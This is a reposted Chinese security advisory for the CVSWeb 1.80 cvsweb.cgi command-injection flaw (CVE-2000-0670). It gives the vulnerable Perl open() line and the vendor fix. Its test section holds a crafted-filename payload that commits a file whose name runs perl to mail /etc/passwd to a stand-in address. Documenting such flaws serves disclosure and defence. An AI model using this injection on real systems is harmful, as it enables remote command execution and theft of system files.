CVSWeb的cvsweb.cgi远程执行任意命令漏洞
2008-04-09 04:32:36来源:互联网 阅读 ()
发布日期:2000-07-12
更新日期:2000-07-12
受影响系统:
Zeller CVSWeb 1.80不受影响系统:
Zeller CVSWeb 1.89描述:
Zeller CVSWeb 1.86
BUGTRAQ ID: 1469
CVE(CAN) ID: CVE-2000-0670
CVSWeb是一种基于Web的可被用来在主机之间共享程序代码的软件开发工具。
Cvsweb 1.80存在一个安全漏洞,远程攻击者只要对cvs库有写权限,就可以获得对cvs server的shell访问权限,以CVS守护进程的权限执行任意命令。
出问题的代码在cvsweb.cgi脚本中:
open($fh, "rlog '$filenames' 2>/dev/null |")
由于对Perl的open()函数被错误调用,攻击者可以通过建立一个特殊的文件名,来发动攻击。
<*来源:Joey Hess (joey@kitenet.net)
链接:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0670
http://online.securityfocus.com/bid/1469/info/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE
然后攻击者会访问cvsweb页面,浏览他设置木马文件的目录。这将导致/etc/passwd 文件被发送给攻击者,当然攻击者也可以执行其他的命令。
建议:
厂商补丁:
Zeller
------
厂商已经在1.86版的软件中修补了这个安全漏洞,请到厂商的主页下载:
http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash